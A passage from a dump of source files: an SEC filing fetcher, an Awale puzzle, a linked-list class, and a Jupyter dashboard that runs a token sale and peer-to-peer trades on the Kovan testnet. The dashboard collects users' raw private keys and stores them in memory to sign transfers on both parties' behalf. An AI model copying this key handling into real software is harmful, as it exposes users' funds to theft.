\"http://edgar.secdatabase.com/{}/{}/\".format(prefix, acc_num_int)\n return(url)\n\n\ndef getDocumentStr(accession_num):\n import MyUtil\n prefix_url =getSecdbUrlByAccessNum(accession_num)\n filelist_url = prefix_url+\"filelist.txt\"\n filelist_str= MyUtil.requestContent(filelist_url)\n\n firsthtml= filelist_str.split('\\r')[0].split('\\t')[2]\n firsthtml_url = prefix_url+firsthtml\n print(firsthtml_url)\n html_str= MyUtil.requestContent(firsthtml_url)\n return(html_str)\n\n\ndef getAccessionNum(ticker):\n print('the getAccessionNum returns a hardcoded list for now...')\n return ['0001326428-11-000012', '0000049600-11-000013', '0001437749-11-002604']\n\n\n#read Doc list for a givenr ticker\\\ndef loadDocList4Secdb(ticker):\n sql =\"\"\"\n select --Symbol, h.AccessionNumber,DocumentName,h.Description,s.ActionDate,s.FilingDate,\n 'http://edgar.secdatabase.com/'+ CONVERT(VARCHAR, CONVERT(BIGINT, REPLACE(h.AccessionNumber, '-',''))%2999)+'/'+CONVERT(VARCHAR,CONVERT(BIGINT, REPLACE(h.AccessionNumber, '-','')))+'/'+DocumentName AS URL\n from EDGAR.dbo.SecurityIdentifierMapping m\n cross apply (\n select l.SubmissionId from HeaderSubmissionCompanyLink l\n inner join HeaderCompany c on l.CompanyId = c.CompanyId\n where c.cik = m.CIK) f\n inner join HeaderSubmission s\n on f.SubmissionId = s.SubmissionId\n inner join EDGAR..HeaderDocument h on s.AccessionNumber = h.AccessionNumber\n WHERE m.Symbol ='{}'\n and s.FilingDate between '20160101' and '20170628'\n and h.Type IN ('10-Q')\n \"\"\".format(ticker)\n\n conn= MyUtil.getConnection('sec')\n res= pandas.read_sql(sql, conn)['URL'].values\n conn.close()\n return(res)\n\n\nif __name__==\"__main__\":\n a = loadDocList4Secdb(\"IBM\")\n print(a)\n","sub_path":"SecdbAPI.py","file_name":"SecdbAPI.py","file_ext":"py","file_size_in_byte":2034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"28733471","text":"import sys\nimport math\n\nop_bowls = input().split()\nmy_bowls = input().split()\nnum = int(input())\n\nind, mine, n = num, True, int(my_bowls[num])\nmy_bowls[ind] = '0'\n\nwhile n > 0:\n ind += 1\n if mine and ind == 7:\n mine = False\n ind = 0\n elif not mine and ind == 6:\n mine = True\n ind = 0\n if mine:\n my_bowls[ind] = str(int(my_bowls[ind])+1)\n else:\n op_bowls[ind] = str(int(op_bowls[ind])+1)\n n -= 1\n\nif mine and ind == 6:\n replay = True\nelse:\n replay = False\n\nans = \"\".join(op_bowls[i] + \" \" for i in range(6))\nans += \"[\" + op_bowls[6] + \"]\\n\"\nans += \"\".join(my_bowls[i] + \" \" for i in range(6))\nans += \"[\" + my_bowls[6] + \"]\"\nprint(ans)\nif replay: print(\"REPLAY\")","sub_path":"practice/puzzles/easy/Simple_Awale.py","file_name":"Simple_Awale.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"213207176","text":"from abis_and_keys import *\nfrom constants import *\nfrom lstm_predictor import prediction_plot\nimport pandas as pd\n#import os\nimport yfinance as yf\nimport numpy as np\nimport requests\nimport json\nfrom datetime import datetime\nfrom threading import Timer\nimport ipywidgets as widgets\nfrom IPython.display import display\nimport hvplot.pandas\nimport web3\nfrom web3 import Web3\nfrom web3.middleware import geth_poa_middleware\nfrom web3.gas_strategies.time_based import medium_gas_price_strategy\nfrom web3.auto.gethdev import w3\nfrom eth_account import Account\nfrom bit.network import NetworkAPI\nfrom dotenv import load_dotenv\nfrom pathlib import 
Path\nimport arch as arch\n\n#Reading In First DF\nfile_path = Path('PrivateEquityReturnsFinal.csv')\npe_df = pd.read_csv(file_path, parse_dates=True, index_col='Date', infer_datetime_format=True)\npe_df.drop(columns='Unnamed: 8', inplace=True)\npe_df.dropna(inplace=True)\n\n#Final PE DF\ndf = pd.DataFrame(pe_df['Private Equity Returns'])\n\n#Reading In The Second DF\nfile_path_2 = Path('SPXReturns.csv')\neq_df = pd.read_csv(file_path_2, parse_dates=True, index_col='Date', infer_datetime_format=True)\neq_df.dropna(inplace=True)\n\n#Returns DF\nreturns_df = pd.concat([df, eq_df], axis=1, join='inner')\n\n#Calculating the Funds STD\nrolling_std = returns_df.rolling(window=4).std()\n\n#Plotting Fund Returns STD \nrolling_std_plot = rolling_std['Private Equity Returns'].hvplot(title=\"Fund Standard Deviation\")\n\n#Plotting Market STD \nmarket_std_plot = rolling_std['SPX_Return'].hvplot(title=\"S&P 500 Standard Deviation\")\n\nfund_and_market_std = rolling_std.hvplot(y=['Private Equity Returns', 'SPX_Return'], title='Fund vs. SPX Standard Deviation')\n\n#Calculating Covariance \nrolling_covariance = returns_df['Private Equity Returns'].rolling(window=4).cov(returns_df['SPX_Return'])\n\n#Calculate Rolling Variance \nrolling_variance_spx = returns_df['SPX_Return'].rolling(window=4).var()\n\n#Calculate the rolling 1 year beta of the Fund\nrolling_beta = rolling_covariance / rolling_variance_spx\nrolling_beta_plot = rolling_beta.hvplot(title=\"Fund Beta\")\n\n#Calculate Sharpe Ratios for entire group\nsharpe_ratios = (returns_df.mean()*4)/(returns_df.std()*np.sqrt(4))\nsharpe_ratios.sort_values(inplace=True)\n\n# Visualize the sharpe ratios as a bar plot\nsr_plot = sharpe_ratios.hvplot.bar(title=\"Sharpe Ratios\")\n\nsr_cum_plot = pe_df['Cumulative'].hvplot(title=\"Fund's Cumulative Return\")\n\n\n\n# 1 of the following networks must be selected\n# For local network\n#w3 = Web3(Web3.HTTPProvider(\"http://127.0.0.1:8545\"))\n\n# For Kovan live testnet\nw3 = Web3(Web3.HTTPProvider(f\"https://kovan.infura.io/v3/{INFURA_PROJECT_ID}\"))\n\n\n# Ignore\ndef calculate_sharpe(ticker, time_frame):\n \n stock = yf.Ticker(ticker)\n df = stock.history(period=time_frame)['Close'].to_frame()\n \n df['Daily Returns'] = df['Close'].diff()\n df.dropna(inplace=True)\n \n risk_free = 0.0067\n avg_return = df['Daily Returns'].mean()\n vol = df['Daily Returns'].std()\n sharpe = (avg_return - risk_free) / vol * np.sqrt(252)\n \n return sharpe\n\nweights = [0.40, 0.25, 0.15, 0.10, 0.05, 0.05]\n\nconservative_stocks = ['NEM', 'DG', 'REGN', 'DXCM', 'AAPL']\nmoderate_stocks = ['DXCM', 'NVDA', 'ODFL', 'DG', 'REGN', 'AAPL']\naggressive_stocks = ['NVDA', 'DXCM', 'AAPL', 'SWKS', 'ODFL']\n\n# Ignore\ndef cum_return(stock_list, weight_list, time_frame):\n \n df = pd.DataFrame()\n \n for stock in stock_list:\n ticker = yf.Ticker(stock)\n df[f'{stock} Close'] = ticker.history(period=time_frame)['Close']\n df.dropna(inplace=True)\n \n cumulative_returns = [] \n \n for date in df.index:\n index = 0\n adj_closes = []\n \n for i in df.loc[date]:\n adj_close = i * weights[index]\n adj_closes.append(adj_close)\n \n index += 1\n \n cum_adj_return = sum(adj_closes)\n cumulative_returns.append(cum_adj_return)\n \n df['Portfolio Adj. Close'] = cumulative_returns\n \n df['Daily Adj. Return'] = df['Portfolio Adj. Close'].diff()\n df.dropna(inplace=True)\n \n risk_free = 0.0067\n avg_return = df['Daily Adj. Return'].mean()\n vol = df['Daily Adj. 
Return'].std()\n sharpe = (avg_return - risk_free) / vol * np.sqrt(252)\n \n return df, sharpe\n\n\n# Creates contract instances for deployer, token, and token sale\n# Need to update address for deployer contract if redeployed\ndeployer_contract = w3.eth.contract(address=deployer_contract_address, abi=deployer_abi)\n\ncoinA_contract = w3.eth.contract(address=deployer_contract.functions.token_address().call(), abi=coin_abi)\n\ncoinA_sale_contract = w3.eth.contract(address=deployer_contract.functions.token_sale_address().call(), abi=sale_abi)\n\n# API pulls exchange rate - USD/ETH\nurl = 'https://rest.coinapi.io/v1/exchangerate/ETH/USD'\nheaders = {'X-CoinAPI-Key' : exchange_rate_key}\nresponse = requests.get(url, headers=headers).text\neth_rate = json.loads(response)['rate']\n\n\n#### Widgets ####\n\nplot_selector = widgets.Dropdown(\n options = ['Historic Returns', 'Historic Volatility', 'Sharpe Ratios', 'LSTM'],\n value = 'Historic Returns',\n description = 'Select: ',\n style = {'description_width': 'initial'},\n disabled=False\n)\n\nbutton = widgets.Button(\n description = 'Update',\n layout={'border': '1px solid black'}\n)\n\n\n# for use on local blockchain only #\n\n#account_selector = widgets.Dropdown(\n# options = w3.eth.accounts,\n# value = w3.eth.accounts[1],\n# description = 'Account: '\n#)\n\n\ncoin_name = coinA_contract.functions.name().call()\n\n# for use on local blockchain only #\n\n#account_selector = widgets.Dropdown(\n# options = w3.eth.accounts,\n# value = w3.eth.accounts[1],\n# description = 'Account: '\n#)\n\n# Must input account address and private key manually on live testnet\naccount_selector = widgets.Text(\n value = '',\n description = 'Account: ',\n placeholder = 'Enter account address'\n)\n\nkey_input = widgets.Password(\n value = '',\n description = 'Private Key: ',\n placeholder = 'Enter private key'\n)\n\n\n# Input token amount for purchase\ncoin_text = widgets.IntText(\n value = 0,\n description = f'{coin_name}s :',\n style = {'description_width': 'initial'},\n disabled = False\n)\n\n# Purchase button\ncoin_button = widgets.Button(\n description = 'Buy!',\n layout ={'border': '1px solid black'},\n disabled = False\n)\n\n\naccount_input = widgets.HBox([account_selector, key_input])\npurchase_coins = widgets.HBox([coin_text, coin_button])\npurchase_from_acct = widgets.VBox([account_input, purchase_coins])\n\n\n# Show equivalent amount in USD\ndollar_conversion = widgets.Text(\n value = \"{:,}\".format(round(coin_text.value / (10 ** coinA_contract.functions.decimals().call())) * eth_rate, 2),\n description = '$',\n disabled = True\n)\n\n# Confirm purchase\nconfirm_button = widgets.Button(\n description = 'Confirm',\n layout = {'border': '1px solid black'}\n)\n\n# Keeps dollar conversion and confirm button hidden until buy button is clicked\nconfirm_box = widgets.HBox([dollar_conversion, confirm_button])\nconfirm_box.layout.visibility = 'hidden'\npurchase_box = widgets.VBox([purchase_from_acct, confirm_box])\n\n\n# Displays the buyer's purchased tokens\ncons_coin = widgets.IntText(\n value = 0,\n description = f'Your {coin_name}s: ',\n style = {'description_width': 'initial'},\n disabled = True\n)\n\n# Remaining Token Supply\ncons_coin_supply = widgets.IntText(\n value = (coinA_sale_contract.functions.cap().call() - coinA_sale_contract.functions.weiRaised().call()) / (10**coinA_contract.functions.decimals().call()),\n description = f'Remaining supply of {coin_name}: ',\n style = {'description_width': 'initial'},\n disabled = True\n)\n\n\n# Withdraw Tokens 
widgets\nwithdraw_account = widgets.Text(\n value = '',\n description = 'Account: ',\n placeholder = 'Enter account address: ',\n width = '100%'\n)\n\nwithdraw_key_input = widgets.Password(\n value = '',\n description = 'Private key: ',\n placeholder = 'Enter private key: ',\n layout = widgets.Layout(align_items='center')\n)\n\nwithdraw_button = widgets.Button(\n description = 'Withdraw Tokens',\n layout={'border': '1px solid black'}\n #layout = widgets.Layout(align_items='center')\n)\n\n\ntoken_balance = widgets.IntText(\n value = 0,\n description = coinA_contract.functions.symbol().call(),\n layout = widgets.Layout(align_items='center'),\n disabled = True\n)\n\ntoken_balance_button = widgets.Button(\n description = f'Get {coin_name} Balance',\n layout={'border': '1px solid black'}\n #layout = widgets.Layout(align_items='center')\n)\n\n\n# setting exchange rate for ETH to YodaCoins\nexchange_rate = 1 / (10**(18-coinA_contract.functions.decimals().call()))\n\n# function to convert private key into a readable format for web3 / bit\ndef priv_key_to_account (priv_key):\n return Account.privateKeyToAccount(priv_key)\n\n\n# function to create raw, unsigned transaction\ndef seller_tx(coin, seller_account, buyer_account, amount):\n\n seller_gas_estimate = w3.eth.estimateGas({\n \"from\": seller_account.address, \n \"to\": buyer_account, \n \"value\": w3.toWei(amount,'ether') \n })\n \n seller_details = {\n \"from\": seller_account.address,\n \"to\": buyer_account,\n \"value\": w3.toWei(amount,'ether') ,\n \"gas\": seller_gas_estimate,\n \"gasPrice\": w3.eth.gasPrice,\n \"nonce\": w3.eth.getTransactionCount(seller_account.address),\n }\n \n return seller_details\n\n\n# function to create, sign, and send ethereum transaction \ndef send_tx(coin, seller, seller_pk, buyer, buyer_pk, amount, rate):\n \n seller_raw_tx = seller_tx(coin, seller_pk, buyer, amount)\n seller_signed_tx = seller_pk.signTransaction(seller_raw_tx)\n \n seller_result = w3.eth.sendRawTransaction(seller_signed_tx.rawTransaction)\n \n return seller_result\n\n\n# function to create, sign, and send YodaCoin transaction \ndef token_tx(seller_account, seller_key, buyer_address, amount):\n \n transfer = coinA_contract.functions.transfer(buyer_address, amount).buildTransaction(\n {\n 'gas' : 3000000,\n 'nonce' : w3.eth.getTransactionCount(seller_account)\n }\n )\n \n signed_transfer = w3.eth.account.signTransaction(transfer, seller_key)\n \n transfer_hash = w3.eth.sendRawTransaction(signed_transfer.rawTransaction)\n \n tx_receipt = w3.eth.waitForTransactionReceipt(transfer_hash)\n \n return tx_receipt\n\n\n# creating empty list to hold trade orders and dict to hold trade order metadata\ntrade_blotter_list = []\ntrade_details = {}\n\n# establishing variable for trade amount\nbuy_sell_amount = None\n\n\n# setting up widgets to create orders \n\n# address input widget\nmaker_account_selector = widgets.Text(\n value = '',\n description = 'Maker Account: ',\n placeholder = 'Enter account address',\n style = {'description_width': 'initial'},\n)\n\n# private key input widget\nmaker_key_input = widgets.Password(\n value = '',\n description = 'Private Key: ',\n placeholder = 'Enter private key'\n)\n\n\n# input token amount for trade\nmaker_coin_text = widgets.IntText(\n value = 0,\n description = 'YodaCoins',\n style = {'description_width': 'initial'},\n disabled = False\n)\n\n# sell order button\nsell_order_button = widgets.Button(\n description = 'Enter Buy Order',\n layout ={'border': '1px solid black'},\n disabled = False\n)\n\n# buy order 
button\nbuy_order_button = widgets.Button(\n description = 'Enter Sell Order',\n layout ={'border': '1px solid black'},\n disabled = False\n)\n\n\n# function to initiate a new sell order and add to the trade blotter upon button click\ndef sell_order_button_clicked(b):\n \n with trade_taker_output:\n \n seller_address = maker_account_selector.value\n seller_private_key = maker_key_input.value\n seller_pk_readable = priv_key_to_account(seller_private_key)\n buy_sell_amount = maker_coin_text.value\n\n trade_blotter_list.append(f'Sell {buy_sell_amount} YodaCoins')\n trade_blotter.options = trade_blotter_list\n trade_details[trade_blotter_list[-1]] = [seller_address, \n seller_private_key, \n priv_key_to_account(seller_private_key), \n buy_sell_amount, \n 'sell']\n \n trade_taker_output.clear_output()\n display(trade_taker)\n\nsell_order_button.on_click(sell_order_button_clicked)\n\n\n# function to initiate a new buy order and add to the trade blotter upon button click\ndef buy_order_button_clicked(b):\n \n with trade_taker_output:\n \n seller_address = maker_account_selector.value\n seller_private_key = maker_key_input.value\n seller_pk_readable = priv_key_to_account(seller_private_key)\n buy_sell_amount = maker_coin_text.value\n\n trade_blotter_list.append(f'Buy {buy_sell_amount} YodaCoins')\n trade_blotter.options = trade_blotter_list\n trade_details[trade_blotter_list[-1]] = [seller_address, \n seller_private_key, \n priv_key_to_account(seller_private_key),\n buy_sell_amount, \n 'buy']\n \n trade_taker_output.clear_output()\n display(trade_taker)\n\nbuy_order_button.on_click(buy_order_button_clicked)\n\n\n# grouping widgets for order entry\naccount_input = widgets.VBox([maker_account_selector, maker_key_input])\nbuy_sell_buttons = widgets.HBox([sell_order_button, buy_order_button])\norder_amount = widgets.VBox([maker_coin_text, buy_sell_buttons])\n\nbuy_sell_order = widgets.VBox([account_input, order_amount])\n\n\n# creating widget to take trades \n\ntrade_selection = None\n\naccount_selector_2 = widgets.Text(\n value = '',\n description = 'Taker Account: ',\n placeholder = 'Enter account address',\n style = {'description_width': 'initial'},\n)\n\nkey_input_2 = widgets.Password(\n value = '',\n description = 'Private Key: ',\n placeholder = 'Enter private key'\n)\n\n\ntrade_blotter = widgets.Select(\n options = trade_blotter_list,\n description='Available Trades:',\n style = {'description_width': 'initial'},\n disabled=False\n)\n\n# accept trade button\naccept_trade_button = widgets.Button(\n description = 'Accept Trade',\n layout ={'border': '1px solid black'},\n disabled = False\n)\n\n\n# grouping trade taking widgets\ntrade_taker = widgets.VBox([account_selector_2, key_input_2, trade_blotter])\n\n\n# converting trade taker widget into an output widget so that it can be updated dynamically \ntrade_taker_output = widgets.Output()\n\nwith trade_taker_output:\n #trade_taker_output.clear_output()\n display(trade_taker)\n \n \n# function to initiate transaction upon accepting the trade\n# def token_tx(seller_account, seller_key, buyer_address, amount):\ndef accept_trade_button_clicked(b):\n \n with trade_taker_output:\n\n trade_selection = trade_blotter.value\n seller_address = trade_details[trade_selection][0]\n seller_private_key = trade_details[trade_selection][1]\n seller_pk_readable = trade_details[trade_selection][2]\n token_amount = trade_details[trade_selection][3]\n buyer_address = account_selector_2.value\n buyer_private_key = key_input_2.value\n buyer_pk_readable = 
priv_key_to_account(buyer_private_key)\n\n if trade_details[trade_selection][4] == 'sell':\n\n send_tx(\n ETH,\n seller_address,\n seller_pk_readable,\n buyer_address,\n buyer_pk_readable,\n token_amount * exchange_rate, # * (10**coinA_contract.functions.decimals().call()),\n exchange_rate\n )\n \n token_tx(\n buyer_address,\n buyer_private_key,\n seller_address,\n token_amount * (10**coinA_contract.functions.decimals().call())\n )\n\n elif trade_details[trade_selection][4] == 'buy':\n\n send_tx(\n ETH,\n buyer_address,\n buyer_pk_readable, \n seller_address,\n seller_pk_readable,\n token_amount * exchange_rate, # * (10**coinA_contract.functions.decimals().call()),\n exchange_rate\n )\n \n token_tx(\n seller_address,\n seller_private_key,\n buyer_address,\n token_amount * (10**coinA_contract.functions.decimals().call())\n )\n \n trade_blotter_list.remove(trade_selection)\n trade_blotter.options = trade_blotter_list\n trade_taker_output.clear_output()\n display(trade_taker)\n\naccept_trade_button.on_click(accept_trade_button_clicked)\n\n\n# creating final exchange dashboard\ntrading_app_dash = widgets.VBox(\n [buy_sell_order,trade_taker_output,accept_trade_button],\n layout ={'border': '1px solid black'},\n disabled = False\n)\n\n\n\n# Withdraw tokens functionality - remains hidden until contract is finalized\naccount_box = widgets.VBox([withdraw_account], \n layout = widgets.Layout(align_items='center'),\n width = '100%'\n )\nwithdraw_box = widgets.VBox([withdraw_key_input, withdraw_button], \n layout = widgets.Layout(align_items='center')\n )\ntoken_balance_box = widgets.VBox([token_balance, token_balance_button], \n layout = widgets.Layout(align_items='center')\n )\nafter_sale_box = widgets.AppLayout(\n header = account_box,\n left_sidebar = withdraw_box,\n center = None,\n right_sidebar = token_balance_box,\n footer = None,\n width = '100%'\n #align_items = 'center'\n)\n\npost_sale_box = widgets.VBox([after_sale_box, trading_app_dash])\n\n\npost_sale_box.layout.visibility = 'hidden'\n\n \ncoins_purchased_box = widgets.VBox([cons_coin, cons_coin_supply])\ncoins_box = widgets.VBox([purchase_box, coins_purchased_box])\n \n\ndef select_plots(selector):\n \n if selector == 'Historic Returns':\n plot = fund_and_market_std\n \n elif selector == 'Historic Volatility':\n plot = rolling_beta_plot\n \n elif selector == 'Sharpe Ratios':\n plot = sr_plot\n \n elif selector == 'LSTM':\n plot = prediction_plot\n \n return plot\n\n\n\n## Output widgets ##\n\nout = widgets.Output()\nwith out:\n plot = select_plots(plot_selector.value)\n display(plot)\n \n\ncoin_out = widgets.Output()\nwith coin_out:\n if coinA_sale_contract.functions.isOpen().call():\n display(coins_box)\n else:\n pass\n \n \nconfirm_out = widgets.Output()\nwith confirm_out:\n if coinA_sale_contract.functions.hasClosed().call():\n pass\n else:\n display(confirm_box)\n \n \nwithdraw_out = widgets.Output()\nwith withdraw_out:\n if coinA_sale_contract.functions.finalized().call():\n post_sale_box.layout.visibility = 'visible'\n display(post_sale_box)\n else:\n# #post_sale_box.layout.visibility = 'hidden'\n pass\n \n \n \n## On-click event widgets ##\n\n# Update visuals\ndef on_button_clicked(b):\n with out:\n out.clear_output()\n plot = select_plots(plot_selector.value)\n display(plot)\n\nbutton.on_click(on_button_clicked)\n\n\n# Display dollar conversion and Confirm button\ndef coin_button_clicked(b):\n with confirm_out:\n if coin_text.value > cons_coin_supply.value:\n coin_text.value = cons_coin_supply.value\n else:\n pass\n \n 
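# convert the requested token amount to USD using the ETH/USD rate pulled from CoinAPI above\n        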
dollar_conversion.value = \"{:,}\".format(round(coin_text.value / (10 ** (18-coinA_contract.functions.decimals().call())) * eth_rate, 2))\n confirm_out.clear_output()\n \n confirm_box.layout.visibility = 'visible'\n display(confirm_box)\n \ncoin_button.on_click(coin_button_clicked)\n\n\n# Declare event when Confirm button is clicked - Activate Buy Tokens function\ndef confirm_button_clicked(b):\n \n with coin_out:\n coin_out.clear_output()\n \n buyer_address = account_selector.value\n \n if coinA_sale_contract.functions.capReached().call() or coinA_sale_contract.functions.hasClosed().call():\n coin_text.disabled = True\n coin_button.disabled = True\n \n elif coin_text.value * coinA_contract.functions.decimals().call() >= coinA_sale_contract.functions.cap().call() - coinA_sale_contract.functions.weiRaised().call():\n \n nonce = w3.eth.getTransactionCount(buyer_address)\n remaining_supply = coinA_sale_contract.functions.cap().call() - coinA_sale_contract.functions.weiRaised().call()\n \n transaction = coinA_sale_contract.functions.buyTokens(\n buyer_address).buildTransaction(\n {\n 'value': remaining_supply,\n 'gas': 3000000,\n 'nonce': nonce\n }\n )\n signed_txn = w3.eth.account.signTransaction(transaction, key_input.value)\n txn_hash = w3.eth.sendRawTransaction(signed_txn.rawTransaction)\n tx_receipt = w3.eth.waitForTransactionReceipt(txn_hash)\n \n cons_coin.value = coinA_sale_contract.functions.balanceOf(buyer_address).call() / (10**coinA_contract.functions.decimals().call())\n \n cons_coin_supply.value = (coinA_sale_contract.functions.cap().call() - coinA_sale_contract.functions.weiRaised().call()) / (10**coinA_contract.functions.decimals().call())\n \n coin_text.disabled = True\n coin_button.disabled = True\n \n else:\n nonce = w3.eth.getTransactionCount(buyer_address)\n \n transaction = coinA_sale_contract.functions.buyTokens(\n buyer_address).buildTransaction(\n {\n 'value': coin_text.value * (10**coinA_contract.functions.decimals().call()),\n 'gas': 3000000,\n 'nonce': nonce\n }\n )\n signed_txn = w3.eth.account.signTransaction(transaction, key_input.value)\n txn_hash = w3.eth.sendRawTransaction(signed_txn.rawTransaction)\n tx_receipt = w3.eth.waitForTransactionReceipt(txn_hash)\n \n cons_coin.value = coinA_sale_contract.functions.balanceOf(buyer_address).call() / (10**coinA_contract.functions.decimals().call())\n \n cons_coin_supply.value = (coinA_sale_contract.functions.cap().call() - coinA_sale_contract.functions.weiRaised().call()) / (10**coinA_contract.functions.decimals().call())\n \n coin_text.value = 0\n confirm_box.layout.visibility = 'hidden'\n \n display(coins_box)\n \nconfirm_button.on_click(confirm_button_clicked)\n\n\n# Declare event when withdraw button is clicked - withdraw tokens that were previously purchased\ndef withdraw_button_clicked(b):\n with withdraw_out:\n withdraw_address = withdraw_account.value\n withdraw_key = withdraw_key_input.value\n withdraw_out.clear_output()\n #post_sale_box.layout.visibility = 'visible'\n display(post_sale_box)\n \n withdraw = coinA_sale_contract.functions.withdrawTokens(withdraw_address).buildTransaction(\n {\n 'gas': 3000000,\n 'nonce': w3.eth.getTransactionCount(withdraw_address)\n }\n )\n signed_txn_withdraw = w3.eth.account.signTransaction(withdraw, withdraw_key_input.value)\n txn_hash_withdraw = w3.eth.sendRawTransaction(signed_txn_withdraw.rawTransaction)\n tx_receipt_withdraw = w3.eth.waitForTransactionReceipt(txn_hash_withdraw)\n \nwithdraw_button.on_click(withdraw_button_clicked)\n\n\n# Retrieve token balance\ndef 
token_balance_button_clicked(b):\n    with withdraw_out:\n        balance_address = withdraw_account.value\n        token_balance.value = coinA_contract.functions.balanceOf(balance_address).call() / (10**coinA_contract.functions.decimals().call())\n    \ntoken_balance_button.on_click(token_balance_button_clicked)\n\n\n\n# Organizes the widgets into layout boxes\ninteractions = widgets.HBox([plot_selector, button])\nuser_box = widgets.VBox([interactions, out])\n\n# Complete dashboard\ndash = widgets.VBox([user_box, coin_out, post_sale_box], layout={'border': '2px solid black'})\n\n\n\n# Sets a timer to automatically finalize the crowdsale when closing time has been reached.\n#now = datetime.now()\nclosingTime = coinA_sale_contract.functions.closingTime().call()\ntime_window = (datetime.fromtimestamp(closingTime) - datetime.now())\nseconds = time_window.seconds + 1\n\n# Activates Finalize function automatically when closingTime is reached.\n# Then displays post-sale widgets.\ndef finalize_sale():\n    time_till_finalize.cancel()\n    \n    #if coinA_sale_contract.caller.goalReached():\n    \n    try:\n        transaction_fin = coinA_sale_contract.functions.finalize().buildTransaction(\n            {\n                'gas': 3000000,\n                'nonce': w3.eth.getTransactionCount(owner_address)\n            }\n        )\n        signed_txn_fin = w3.eth.account.signTransaction(\n            transaction_fin, owner_private_key\n        )\n        txn_hash_fin = w3.eth.sendRawTransaction(signed_txn_fin.rawTransaction)\n        tx_receipt_fin = w3.eth.waitForTransactionReceipt(txn_hash_fin)\n\n    except:\n        coinA_sale_contract.functions.finalized().call()\n    \n    #else: # Something should happen if funds are not raised when time ends\n    \n        #print('Funds not raised')\n    \n    coin_text.disabled = True\n    coin_button.disabled = True\n    account_selector.disabled = True\n    account_selector.value = ''\n    key_input.disabled = True\n    key_input.value = ''\n    \n    coins_box.layout.visibility = 'hidden'\n    post_sale_box.layout.visibility = 'visible'\n    \n    with withdraw_out:\n        display(post_sale_box)\n    \n\ntime_till_finalize = Timer(seconds, finalize_sale)\n\ntime_till_finalize.start()\n","sub_path":"updated_dash/.ipynb_checkpoints/port_dash-checkpoint.py","file_name":"port_dash-checkpoint.py","file_ext":"py","file_size_in_byte":26718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
+{"seq_id":"395494315","text":"#Complete the LinkedList datatype by implementing the delete, equality, iterate,\n#length, and membership operations. Make sure they have the complexity given\n#in the LinkedList complexities table. Then, implement a test program in your\n#main function to thoroughly test the operations you implemented. 
Call the module\n#linkedlist.py so that you can import this into other programs that may need it.\n\nclass LinkedList:\n class __Node:\n def __init__(self,item,next=None):\n self.item = item\n self.next = next\n \n def getItem(self):\n return self.item \n\n def getNext(self):\n return self.next\n\n def setItem(self, item):\n self.item = item\n\n def setNext(self,next):\n self.next = next\n \n def __init__(self,contents=[]): \n self.first = LinkedList.__Node(None,None)\n self.last = self.first\n self.numItems = 0\n\n for e in contents:\n self.append(e)\n \n \n def __getitem__(self, index):\n if index >= 0 and index < self.numItems:\n cursor = self.first.getNext()\n for i in range(index):\n cursor = cursor.getNext()\n \n return cursor.getItem()\n \n raise IndexError(\"LinkedList index out of range\")\n \n \n def __setitem__(self, index, val):\n if index >= 0 and index < self.numItems:\n cursor = self.first.getNext()\n for i in range(index):\n cursor = cursor.getNext()\n \n return cursor.setItem(val)\n \n raise IndexError(\"LinkedList assignment index out of range\") \n \n \n def __add__(self, other):\n if type(self) != type(other):\n raise TypeError(\"Concatenate undefined for \" + str(type(self)) + \" + \" + str(type(other)))\n \n result = LinkedList()\n \n cursor = self.first.getNext()\n \n while cursor != None:\n result.append(cursor.getItem())\n cursor = cursor.getNext()\n \n cursor = other.first.getNext()\n \n while cursor != None:\n result.append(cursor.getItem())\n cursor = cursor.getNext()\n \n return result \n \n def append(self, item):\n node = LinkedList.__Node(item)\n self.last.setNext(node)\n self.last = node\n self.numItems += 1\n \n def insert(self, index, item):\n cursor = self.first\n \n if index < self.numItems:\n for i in range(index):\n cursor = cursor.getNext()\n \n node = LinkedList.__Node(item, cursor.getNext())\n cursor.setNext(node)\n self.numItems += 1\n \n else:\n self.append(item)\n \n \n def __delitem__(self, index):\n cursor = self.first\n i = 0\n \n while cursor.getNext() != None:\n if i == index:\n cursor.setNext(cursor.getNext().getNext())\n self.numItems -= 1\n if cursor.getNext() == None:\n self.last = cursor\n\n return \n else:\n cursor = cursor.getNext()\n i+=1\n \n\n def __eq__(self, other):\n cursor1 = self.first\n cursor2 = other.first\n \n if self.numItems != other.numItems:\n return False\n \n for i in range(self.numItems):\n if cursor1.getItem() != cursor2.getItem():\n return False\n cursor1 = cursor1.getNext()\n cursor2 = cursor2.getNext()\n \n return True\n \n \n def __iter__(self):\n for i in range(self.numItems):\n if i != None:\n yield self[i]\n \n \n def __len__(self):\n return self.numItems\n \n def __contains__(self, item):\n for i in self:\n if i == item:\n return True\n return False\n \n \n \ndef main():\n x = LinkedList([1,2,3,4,5,6])\n \n print(x[1])\n del x[1]\n print(x[1])\n print(x[2])\n \n a = LinkedList([5,4,3,2])\n b = LinkedList([5,4,3,2])\n print(a == b)\n \n c = LinkedList([1,2,3,4])\n d = LinkedList([7])\n print(c == d)\n print(c == a)\n \n print(len(c))\n \n for i in a:\n print(i)\n \n print(\"Space for readability\")\n \n for n in x:\n print(n)\n \n \n print(len(a))\n print(len(b))\n \n#main()\n\n","sub_path":"linkedlist.py","file_name":"linkedlist.py","file_ext":"py","file_size_in_byte":4263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"169950096","text":"import time\nimport pickle\nimport os.path\nimport scipy.io\nfrom residual_booster_network import *\n\ndevice = 
